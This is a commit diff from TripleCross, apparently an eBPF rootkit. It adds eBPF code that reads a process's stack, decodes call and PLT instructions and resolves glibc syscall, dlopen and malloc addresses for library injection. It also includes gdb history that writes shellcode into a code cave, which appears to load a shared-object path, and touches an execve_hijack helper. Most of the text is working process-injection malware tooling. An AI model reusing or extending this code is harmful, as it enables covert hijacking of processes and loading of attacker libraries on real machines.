admin/TripleCross
1
0
Fork 0
mirror of https://github.com/h3xduck/TripleCross.git synced 2025-12-25 19:03:07 +08:00
Code Issues Packages Projects Releases Wiki Activity

Adapted memory analysis to larger memory addresses inside the virtual address space. Solved bugs and others, adapting code for RELRO.

Browse Source
This commit is contained in:
h3xduck
2022-04-04 17:07:45 -04:00
parent 8f28c3a883
commit 748062f464
13 changed files with 12256 additions and 11528 deletions
Download Patch File Download Diff File Expand all files Collapse all files

BIN
src/.output/kit.o
View File

Binary file not shown.

23122
src/.output/kit.skel.h
View File

File diff suppressed because it is too large Load Diff

BIN
src/bin/kit
View File

Binary file not shown.

46
src/ebpf/include/bpf/injection.h
View File

@@ -14,6 +14,7 @@
#define OPCODE_JUMP_BYTE_0 0xe8
#define GLIBC_OFFSET_MAIN_TO_SYSCALL 0xf00d0
#define GLIBC_OFFSET_MAIN_TO_DLOPEN 0x12f120
#define GLIBC_OFFSET_MAIN_TO_MALLOC 0x6eca0
#define CODE_CAVE_ADDRESS 0x0000000000402e95
struct sys_timerfd_settime_enter_ctx {
@@ -60,29 +61,35 @@ static __always_inline int check_syscall_opcodes(__u8* opcodes){
static __always_inline int stack_extract_return_address_plt(__u64 stack){
//We have a possible call instruction, we check if it starts with the correct format
__u8 *op = (__u8*)(stack - 0x5);
__u64 *op = (__u64*)(stack - 0x5);
__u8 opcode_arr[5];
bpf_probe_read(&opcode_arr, 5*sizeof(__u8), op);
if(bpf_probe_read(&opcode_arr, 5*sizeof(__u8), op)<0){
//bpf_printk("Failed to read stack position\n");
return -1;
}
//bpf_printk(" -- Checking: %lx, res: %x %x", op, opcode_arr[0], opcode_arr[1]);
//bpf_printk("%x %x %x\n", opcode_arr[2], opcode_arr[3], opcode_arr[4]);
if (opcode_arr[0] != OPCODE_JUMP_BYTE_0) {
//bpf_printk(" -- Failed OPCODE: %x\n", opcode_arr[0]);
return -1;
}
bpf_printk("Success OPCODE: %lx\n", op);
//We have localized the call instruction and thus quite probably the saved RIP.
//We proceed to get the offset of the call.
__u32 offset;
if(bpf_probe_read_user(&offset, sizeof(__u32), &op[1])<0){
__s32 offset = 0;
__u8* op8 = (__u8*)(stack - 0x5);
if(bpf_probe_read_user(&offset, sizeof(__s32), &op8[1])<0){ //This takes the 4 MSB omitting the first
bpf_printk("Failed to read op[1]\n");
return -1;
}
bpf_printk("OP[1]: %x\n", &op[1]);
bpf_printk("OP64[1]: %x\n", &op[1]);
bpf_printk("OP8[1]: %x\n", &op8[1]);
bpf_printk("OFFSET: %x\n", offset);
bpf_printk("OFFSET8: %x\n", (__u8)offset);
bpf_printk("OP8: %x\n", (__u8*)op);
__u32 sum = (uintptr_t)(op+offset+5);
bpf_printk("SUM: %x\n", sum);
__u8* call_addr = (__u8*)(__u64)sum;
bpf_printk("OP: %lx\n", op);
__u64 sum = (uintptr_t)((__u64)(op8)+offset+5);
bpf_printk("SUM: %lx\n", sum);
__u64* call_addr = (__u64*)sum;
//We check which address was called. We could either be at libc already after
//following it, or in the PLT entry on the same executable as before.
@@ -98,19 +105,19 @@ static __always_inline int stack_extract_return_address_plt(__u64 stack){
bpf_printk("CALL_OPCODES: %lx\n", call_opcode);
bpf_probe_read_user(&opcode_arr, 2*sizeof(__u8), call_addr);
//bpf_printk("OPCODE0: %x\n", opcode_arr[0]);
//bpf_printk("OPCODE1: %x\n", opcode_arr[1]);
bpf_printk("OPCODE0: %x\n", opcode_arr[0]);
bpf_printk("OPCODE1: %x\n", opcode_arr[1]);
__u8* call_addr_arr = (__u8*)call_addr;
if(opcode_arr[0]==0xff && opcode_arr[1]==0x25){
bpf_printk("Found PLT entry\n");
//We analyze the offset of the jump specified ff 25 XX XX XX XX
//The address to which the jump takes us should be the actual syscall setup
__u32 j_offset;
bpf_probe_read_user(&j_offset, sizeof(__u32), &call_addr[2]);
//j_offset += 6;
//The address to which the jump takes us from the PLT.GOT should be the actual syscall setup
__s32 j_offset;
bpf_probe_read_user(&j_offset, sizeof(__s32), &call_addr_arr[2]); //4 LSB
//We obtain the address of the jump by adding the offset + our current memory address + 6 bytes of the current instruction
__u64* j_addr = (u64*)(call_addr + j_offset + 6);
bpf_printk("JOFFSET: %x\n", j_offset);
__u64* j_addr = (u64*)((__u64)(call_addr_arr) + j_offset + 0x6);
bpf_printk("JOFFSET: %lx\n", j_offset);
bpf_printk("JADDR: %lx\n", j_addr);
//Now that we have the address of the jump, we proceed to get the instruction opcodes there
//However it's a bit more complex since what we have is the address in the GOT section where
@@ -257,6 +264,7 @@ int sys_exit_timerfd_settime(struct sys_timerfd_settime_exit_ctx *ctx){
bpf_printk("PID: %u, SYSCALL_ADDR: %lx, STACK_RET_ADDR: %lx", pid, addr.libc_syscall_address, addr.stack_ret_address);
bpf_printk("Address of libc main: %lx\n", addr.libc_syscall_address - GLIBC_OFFSET_MAIN_TO_SYSCALL);
bpf_printk("Address of libc_dlopen_mode: %lx\n", addr.libc_syscall_address - GLIBC_OFFSET_MAIN_TO_SYSCALL + GLIBC_OFFSET_MAIN_TO_DLOPEN);
bpf_printk("Address of malloc: %lx\n", addr.libc_syscall_address - GLIBC_OFFSET_MAIN_TO_SYSCALL + GLIBC_OFFSET_MAIN_TO_MALLOC);
return 0;
}

500
src/helpers/.gdb_history
View File

@@ -1,256 +1,256 @@
q
find 0x00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 0x401000 0x403000
b *(test_time_values_injection+77 )
r
b __timerfd_settime
c
find 0x00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 0x401000 0x403000
x/128i 0x402e95
x/128x 0x402e95
x/128x 0x402e90
x/128i 0x402e90
x/128i 0x402e89
x/10i 0x402e89
x/10i 0x402e90
x/10i 0x402e80
x/128i 0x402e89
x/256i 0x402e89
x/256i 0x402e90
find 0x90909090909090909090909090909090 0x401000 0x403000
context
x/10i 401520
x/10i 0x401520
x/10i 0x401260
x/10i 0x401250
q
r
disass /r 0x405130
x/10i 0x401520
q
b *(test_time_values_injection+77 )
disass /r test_time_values_injection
b *(test_time_values_injection+169)
r
b __timerfd_settime
c
x/10i 0x401250
x/10i 0x401260
x/10i 0x405130
x/10 0x405130
x/10x 0x405130
c
x/10x 0x405130
x/10i 0x405130
c
x/10i 0x405130
si
c
r
q
r
b *0x4013a8
r
r
r
b test_time_values_injection
r
s
q
b test_time_values_injection
r
b 0x4013a8
b *0x4013a8
b *0x4013a4
r
q
b *0x4013a8
r
b test_time_values_injection
r
n
q
b test_time_values_injection
r
n
ni
del 1
del 2
r
b test_time_values_injection
r
q
r
q
disass test_time_values_injection
q
r
q
si
b test_time_values_injection
r
b __timerfd_settime
r
c
del 1
x/10i 0x405130
c
r
b test
q
b test_time_values_injection
r
n
ni
si
ni
si
si
q
b test_time_values_injection
r
x/10x 0x402e95
x/10x 0x405130
checksecq
q
checksecq
checksec
q
checksec
q
q
q
q
x/10x 0x402e95
b test_time_values_injection
r
x/10x 0x402e95
x/10x 0x405130
b __timerfd_settime
c
x/10x 0x405130
c
x/10x 0x405130
q
b test_time_values_injection
r
b __timerfd_settime
c
si
x/10x 0x405130
disass test_time_values_injection
b *(test_time_values_injection+169 )
c
si
x/10x 0x402e95
q
b test_time_values_injection
r
b __timerfd_settime
c
x/10x 0x402e95
x/10x 0x405130
si
x/10x 0x405130
b *(test_time_values_injection+169 )
c
si
set *(int64_t *)0x402e95 0x10
set *(int64_t *)0x402e95 = 0x10
x/10x 0x405130
x/10x 0x402e95
set *(int64_t *)0x402e95 = 0x102131415161718191
set *(int64_t *)0x7ffff7d89560 =
x/10x 0x402e95
x/10i 0x402e95
x/10b 0x402e95
set *(int64_t *)0x402e95 = 0x50
x/10b 0x402e95
x/10i 0x402e95
x/10i 0x7ffff7d89560
set *(int64_t *)0x402e95 = 0x48B86095D8F7FF7F0000
set *(int64_t *)0x402e95 = 0x48B86095D8F7FF7F00
x/10i 0x402e95
x/10b 0x402e95
set *(int64_t *)0x402e95 = 0x48B86095D8F7FF7F
x/10b 0x402e95
x/10i 0x402e95
disass /r 0x402e95
disass 0x402e95
disass /r *0x402e95
x/10i 0x402e95
x/10x 0x405130
x/10i 0x405130
x/10i 0x401260
x/10b 0x401260
x/10i 0x402e95
x/10b 0x401260
x/10i 0x402e95
x/10b 0x402e95
set *(int64_t *)0x402e95 = 0x48B86095D8F7FF7F
set *(int64_t *)0x402e9d = 0xffe0
x/10b 0x402e95
context
si
x/10i 0x402e95
si
q
b test_time_values_injection
r
b *(test_time_values_injection+169)
r
c
x/10i 0x402e95
x/10b 0x401260
x/10x 0x405130
si
set *(int64_t *)0x402e95 = 0x48B86095D8F7FF7F
x/10b 0x402e95
x/10i 0x402e95
set *(int64_t *)0x402e95 = 0x48B86095D8F7FF7F
x/10b 0x402e95
set *(int64_t *)0x402e9d = 0x0000ffe0
x/10b 0x402e95
set 0x402e9d = 0xffe000000
x/10b 0x402e95
x/12b 0x402e95
x/10i 0x402e95
set 0x402e95 = 0x48B86095D8F7FF7F0000
set 0x402e95 = 0x48B86095D8F7FF7F
set *(int64_t *)0x402e95 = 0x48B86095D8F7FF7F
x/10b 0x402e95
x/14b 0x402e95
x/20b 0x402e95
set *(int64_t *)0x402e9d = 0x0000ffe0
x/20b 0x402e95
set *(int64_t *)0x402ead = 0x6F2F650440C76D6F
set *(int64_t *)0x402eb5 = 0x65786F620840C773
x/128b 0x402e95
x/12i 0x402e95
set *(int64_t *)0x402eb5 = 0x65786F620840C773
set *(int64_t *)0x402ebd = 0xC746542F730C40C7
set *(int64_t *)0x402ec5 = 0x40C772732F471040
set *(int64_t *)0x402ecd = 0x1840C765682F6314
set *(int64_t *)0x402ed5 = 0x731C40C77265706C
set *(int64_t *)0x402edd = 0x656A2040C76E692F
set *(int64_t *)0x402ee5 = 0x6E6F692440C77463
set *(int64_t *)0x402eed = 0x2E62696C2840C75F
set *(int64_t *)0x402ef5 = 0x4800006F732C40C7
set *(int64_t *)0x402efd = 0x007FFFF7F165B0B8
set *(int64_t *)0x402f05 = 0x894800000001BE00
set *(int64_t *)0x402f0d = 0x00C481484889DCDF
set *(int64_t *)0x402f1e = 0xD0FFE58948000010
x/12i 0x402e95
x/20i 0x402e95
x/20b 0x402e95
x/10i 0x401230
x/22i 0x402e95
set *(int64_t *)0x402f0d = 0x00C48148DC8948DF
x/22i 0x402e95
set *(int64_t *)0x402f1e = 0xD0FFE58948000010
x/22i 0x402e95
set *(int64_t *)0x402f1e = 0x0000E58948000010
x/22i 0x402e95
set *(int64_t *)0x402f1e = 0x0
x/22i 0x402e95
set *(int64_t *)0x402f15 = 0x0000E58948000010
set *(int64_t *)0x402f15 = 0xD0FFE58948000010
x/22i 0x402e95
x/25i 0x402e95
si
fin
si
ni
q
b *(test_time_values_injection+169)
r
q
disass /r test_time_values_injection
x/10i 0x4013a0
x/10b 0x4013a0
x/20b 0x402e95
set *(int64_t *)0x402e9d = 0xffe000000
x/20b 0x402e95
set *(int64_t *)0x402e9d = 0xffe00000
x/20b 0x402e95
x/10i 0x4013a0
x/20i 0x402e95
x/20b 0x402e95
set *(int64_t *)0x402e95 = 0x7FFFF7D89560B848
x/20b 0x402e95
x/20i 0x402e95
set *(int64_t *)0x402e9d = 0xe0ff00000
x/20i 0x402e95
x/20b 0x402e95
set *(int64_t *)0x402e9d = 0xe0ff0000
x/20i 0x402e95
set *(int64_t *)0x402e95 = 0x7FFFF7D89560B848
x/20i 0x402e95
context
b *(test_time_values_injection+96)
r
si
si
si
si
si
c
q
b *(test_time_values_injection+96)
r
si
q
b *(test_time_values_injection+96)
r
si
x/32b 0x5555555556a9
x/32x 0x5555555556a9
x/2i 0x5555555556a9
disass 0x5555555556a9
disass /r 0x5555555556a9
q
b *(test_time_values_injection+96)
r
si
disass /r 0x5555555556ae
q
b *(test_time_values_injection+96)
r
si
disass /r 0x5555555556ae
q
r
q
r
q
b *(test_time_values_injection+96)
r
si
q
b *(test_time_values_injection+169)
r
si
fin
q
b *(test_time_values_injection+169)
r
si
q
b *(test_time_values_injection+169)
r
si
q
r
q
r
q
r
q
r
q
r
q
r
q
r
q
disass test_time_values_injection
b *(test_time_values_injection+96)
r
si
disass 0x7ffff7ede56c
disass /r 0x7ffff7ede56c
q
b *(test_time_values_injection+96)
r
si
q
b *(test_time_values_injection+96)
r
si
x/2i 0x5555555556a9
x/2b 0x5555555556a9
x/22b 0x5555555556a9
q
b *(test_time_values_injection+96)
r
si
disass /r 0x5555555556ae
q
b *(test_time_values_injection+169)
r
si
q
b *(test_time_values_injection+169)
r
q
b *(test_time_values_injection+96)
r
q
b *(test_time_values_injection+96)
r
q
b test_time_values_injection
r
ni
si
fin
q
r
q
r
q
disass test_time_values_injection
b *(test_time_values_injection+96)
r
si
q
disass test_time_values_injection
b *(test_time_values_injection+94)
r
si
q
b *(test_time_values_injection+94)
r
si
restart
c
r
q
b *(test_time_values_injection+94)
r
si
q
b *(test_time_values_injection+94)
r
si
q
b *(test_time_values_injection+94)
r
si
q
b *(test_time_values_injection+94)
r
si
q
b *(test_time_values_injection+94)
r
si
q
b *(test_time_values_injection+94)
r
si
q
b *(test_time_values_injection+94)
r
si
q
b *(test_time_values_injection+94)
r
si
x/10x 0x5555555556a9
x/10i 0x5555555556a9
q
b *(test_time_values_injection+94)
r
si
q
b *(test_time_values_injection+94)
r
si
q
b *(test_time_values_injection+94)
r
si
q
b *(test_time_values_injection+94)
r
si
q
b *(test_time_values_injection+94)
r
si
x/10i 555555555510
x/10i 0x555555555510
x/10x 0x555555555510
q
b *(test_time_values_injection+94)
r
si
x/10x 0x555555555510
x/10i 0x555555555510
q
q
q
disass test_time_values_injection
b *(test_time_values_injection+167)
r
si
find 0x000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
find 0x000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 0x401000 0x403000
context
q
b *(test_time_values_injection+169)
r
si
x/10i 0x401260
q
b *(test_time_values_injection+169)
r
si
q

2
src/helpers/Makefile
View File

@@ -12,7 +12,7 @@ execve_hijack.o: execve_hijack.c $(HEADERS)
clang -g -c execve_hijack.c
execve_hijack: execve_hijack.o lib/libRawTCP_Lib.a
clang -lm -g -o execve_hijack execve_hijack.o -ldl -L. lib/libRawTCP_Lib.a
clang -g -o execve_hijack execve_hijack.o -ldl -L. lib/libRawTCP_Lib.a
clean:
-rm -f execve_hijack.o

BIN
src/helpers/execve_hijack
View File

Binary file not shown.

BIN
src/helpers/execve_hijack.o
View File

Binary file not shown.

15
src/helpers/opcode_reverser.py Normal file
View File

@@ -0,0 +1,15 @@
#!/usr/bin/env python3
import sys
from itertools import chain
while True:
arg = input()[::-1]
group = 2
result = "".join(chain.from_iterable([reversed(elem) for elem in zip(*[iter(arg)]*group)]))
if(len(result) != len(arg)):
print("String not with even characters?")
#exit(1)
print(result)

2
src/helpers/peda-session-execve_hijack.txt
View File

@@ -1,4 +1,2 @@
break test_time_values_injection
break __dlopen
break *(test_time_values_injection+169)

4
src/helpers/peda-session-sudo.txt
View File

@@ -1,5 +1,3 @@
break test_time_values_injection
disable $bpnum
break *(test_time_values_injection+169)
break *(test_time_values_injection+94)
disable $bpnum